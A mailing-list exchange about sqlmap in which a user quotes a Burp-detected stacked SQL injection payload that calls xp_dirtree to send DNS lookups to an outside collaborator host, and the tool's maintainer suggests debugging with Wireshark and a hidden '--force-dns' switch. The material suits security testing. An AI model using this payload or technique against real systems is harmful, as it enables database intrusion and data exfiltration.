Re: [sqlmap-users] Sqlmap/DNS exfil
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Sqlmap/DNS exfil
|
From: Miroslav S. <mir...@gm...> - 2016-12-19 22:11:00
|
I would suggest you to run the wireshark or similar when running the --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. other service running on :53). About the "forcing" sqlmap for using dns-exfil. It will always at least try to test it at the start of a run (if other injection technique available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available. As said, the best advice I can give to you is to run the wireshark during the run and really see what is going on. Bye On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote: > I have a situation where Burp has detected the following DNS exfiltration > injection for a query parameter in a web app: > > > GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q > %20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux > lo9fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master. > dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1 > > > To make that a little easier to read, the injected value is: > > > ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9ux > lo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree @q;-- > > > I've modified the domain and verified that I receive the DNS requests on > my local DNS server (the domain which I provide to sqlmap using the > --dns-domain=xxx option) when the injection is manually sent to the page. > The problem is, when I pass the request to sqlmap it's not detecting that > there's an injection at all. I've provided the OS/DBMS and --level 5, but > still no dice. I'm using sqlmap v1.0.12#stable. > > > Since I've gotten many other injections to work in the past, I believe > that I'm using sqlmap properly (formatting my request in a file > appropriately, specifying the correct parameter to test, etc.) However, it > surprised me that what appeared to be a fairly straight-forward stacked SQL > injection would slip by all of sqlmap's tests. Is there a way to force > sqlmap to try DNS exfiltration injections despite no other injection > technique succeeding? > > > Thanks > > V > > > > > ------------------------------------------------------------ > ------------------ > Developer Access Program for Intel Xeon Phi Processors > Access to Intel Xeon Phi processor-based developer platforms. > With one year of Intel Parallel Studio XE. > Training and support from Colfax. > Order your platform today.http://sdm.link/intel > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > -- Miroslav Stampar http://about.me/stamparm |
